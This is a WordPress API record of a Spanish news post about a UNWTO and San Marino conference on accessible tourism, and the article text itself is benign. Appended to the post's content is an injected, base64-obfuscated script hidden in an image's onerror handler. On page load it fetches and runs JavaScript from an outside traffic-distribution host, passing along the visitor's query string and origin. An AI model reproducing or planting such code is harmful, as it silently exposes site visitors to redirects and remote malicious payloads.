{"id":6862,"date":"2023-06-09T09:30:25","date_gmt":"2023-06-09T12:30:25","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=6862"},"modified":"2025-08-13T15:59:19","modified_gmt":"2025-08-13T18:59:19","slug":"la-omt-y-san-marino-organizara-una-conferencia-europea-sobre-turismo-accesible","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=6862","title":{"rendered":"La OMT y San Marino organizara una Conferencia Europea sobre Turismo accesible"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-vivid-cyan-blue-background-color has-text-color has-background\"><em>La Rep\u00fablica de San Marino acoger\u00e1 la segunda edici\u00f3n de la Conferencia Europea sobre Turismo Accesible de la OMT, en noviembre. Al promover el compromiso de la OMT de abrir el turismo a todos, la Conferencia mostrar\u00e1 innovaci\u00f3n, alianzas p\u00fablico-privadas y la formulaci\u00f3n de pol\u00edticas inclusivas.<\/em><\/h4>\n\n\n\n<h2 class=\"wp-block-heading\">Turismo accesible: una prioridad para el sector<\/h2>\n\n\n\n<p>La OMT est\u00e1 comprometida a orientar el sector tur\u00edstico mundial hacia una accesibilidad e inclusividad mayores.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright size-large is-resized\"><a href=\"https:\/\/www.termatalia.com\/\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/IMG-20230526-WA0007-727x1024.jpg\" alt=\"\" class=\"wp-image-6825\" width=\"243\" height=\"343\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/IMG-20230526-WA0007-727x1024.jpg 727w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/IMG-20230526-WA0007-213x300.jpg 213w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/IMG-20230526-WA0007-768x1082.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/IMG-20230526-WA0007-1091x1536.jpg 1091w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/IMG-20230526-WA0007-696x980.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/IMG-20230526-WA0007-1068x1504.jpg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/IMG-20230526-WA0007-298x420.jpg 298w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/IMG-20230526-WA0007-320x451.jpg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/IMG-20230526-WA0007-480x676.jpg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/IMG-20230526-WA0007-800x1127.jpg 800w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/IMG-20230526-WA0007.jpg 1136w\" sizes=\"(max-width: 243px) 100vw, 243px\" \/><\/a><figcaption class=\"wp-element-caption\"><em><mark>Publicidad:<\/mark><\/em><\/figcaption><\/figure>\n<\/div>\n\n\n<ul class=\"wp-block-list\">\n<li>Seg\u00fan la Organizaci\u00f3n Mundial de la Salud (OMS),&nbsp;<strong>1 300 millones de personas&nbsp;<\/strong>en todo el mundo experimentan discapacidad considerable, lo cual dificulta la participaci\u00f3n en el turismo. &nbsp;<\/li>\n\n\n\n<li>Aproximadamente&nbsp;<strong>una cuarta parte de la poblaci\u00f3n de la UE<\/strong>, a saber, 87 millones de personas, ya tienen alg\u00fan tipo de discapacidad (EUROSTAT).<\/li>\n\n\n\n<li>El art\u00edculo 30 de la&nbsp;<a href=\"https:\/\/www.un.org\/esa\/socdev\/enable\/documents\/tccconvs.pdf\" target=\"_blank\" rel=\"noreferrer noopener\"><strong>Convenci\u00f3n sobre los Derechos de las Personas con Discapacida<\/strong><\/a><strong>d<\/strong>&nbsp;aboga por que se garantice que las personas con discapacidad tengan acceso a instalaciones, actividades y servicios culturales, deportivos, de esparcimiento y tur\u00edsticos. &nbsp;<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">OMT: Desarrollar un turismo m\u00e1s accesible<\/h2>\n\n\n\n<p>En junio de 2021, la ISO public\u00f3 la primera norma internacional completa sobre turismo accesible,&nbsp;<a href=\"https:\/\/www.unwto.org\/es\/news\/primera-norma-internacional-sobre-turismo-accesible#:~:text=Esta%20norma%2C%20la%20ISO%2021902,especial%20las%20personas%20con%20discapacidad.\">ISO 21902 Turismo accesible para todos<\/a>. La OMT y sus socios lideraron el desarrollo de esta nueva herramienta de orientaci\u00f3n mundial.<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>La norma UNE-ISO 21902 establece requisitos y recomendaciones para el turismo accesible. &nbsp;<\/li>\n\n\n\n<li>Se dirige a los proveedores de servicios y operadores tur\u00edsticos, as\u00ed como a las administraciones p\u00fablicas y los destinos tur\u00edsticos. &nbsp;<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">Hacia la 2.\u00aa Conferencia Europea sobre Turismo Accesible &nbsp;<\/h2>\n\n\n\n<p>Durante la 68\u00aa reuni\u00f3n de la Comisi\u00f3n para Europa de la OMT celebrada en la capital de Bulgaria, Sof\u00eda, el Ministro de Turismo de la Republica de San Marino, Federico Pedini Amati, anunci\u00f3 formalmente que la 2.\u00aa Conferencia Europea sobre Turismo Accesible: Turismo para Todos tendr\u00eda lugar en San Marino, los d\u00edas 16 y 17 de noviembre de 2023.<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>La OMT y San Marino proporcionar\u00e1n una plataforma para que los Gobiernos, los destinos, el sector privado y la sociedad civil discutan las mejores maneras de priorizar la accesibilidad en cualquier pol\u00edtica o estrategia tur\u00edstica.<\/li>\n\n\n\n<li>La Conferencia indicar\u00e1 claramente los numerosos beneficios de un turismo m\u00e1s accesible, desde la creaci\u00f3n de empleos y la potenciaci\u00f3n de las econom\u00edas hasta permitir que m\u00e1s personas viajen y el fortalecimiento de la solidaridad y la cooperaci\u00f3n internacionales. &nbsp;<\/li>\n\n\n\n<li>La Conferencia discutir\u00e1 asimismo la manera en que la aplicaci\u00f3n de los principios de dise\u00f1o universal y las soluciones innovadoras para hacer los entornos naturales y culturales m\u00e1s accesibles cambiar\u00e1n la situaci\u00f3n.<\/li>\n<\/ul>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/www.unwto.org\/es\/news\/la-omt-y-san-marino-organizaran-una-conferencia-europea-sobre-turismo-accesible\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" width=\"1024\" height=\"89\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/07\/omt-Noticias-1024x89.jpg\" alt=\"\" class=\"wp-image-4508\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/07\/omt-Noticias-1024x89.jpg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/07\/omt-Noticias-300x26.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/07\/omt-Noticias-768x67.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/07\/omt-Noticias-1536x133.jpg 1536w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/07\/omt-Noticias-696x60.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/07\/omt-Noticias-1068x93.jpg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/07\/omt-Noticias.jpg 1568w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La Rep\u00fablica de San Marino acoger\u00e1 la segunda edici\u00f3n de la Conferencia Europea sobre Turismo Accesible de la OMT, en noviembre. Al promover el compromiso de la OMT de abrir el turismo a todos, la Conferencia mostrar\u00e1 innovaci\u00f3n, alianzas p\u00fablico-privadas y la formulaci\u00f3n de pol\u00edticas inclusivas. Turismo accesible: una prioridad para el sector La OMT [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":6863,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[12],"tags":[],"class_list":["post-6862","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-internacionales"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/6862","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=6862"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/6862\/revisions"}],"predecessor-version":[{"id":10387,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/6862\/revisions\/10387"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/6863"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=6862"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=6862"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=6862"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}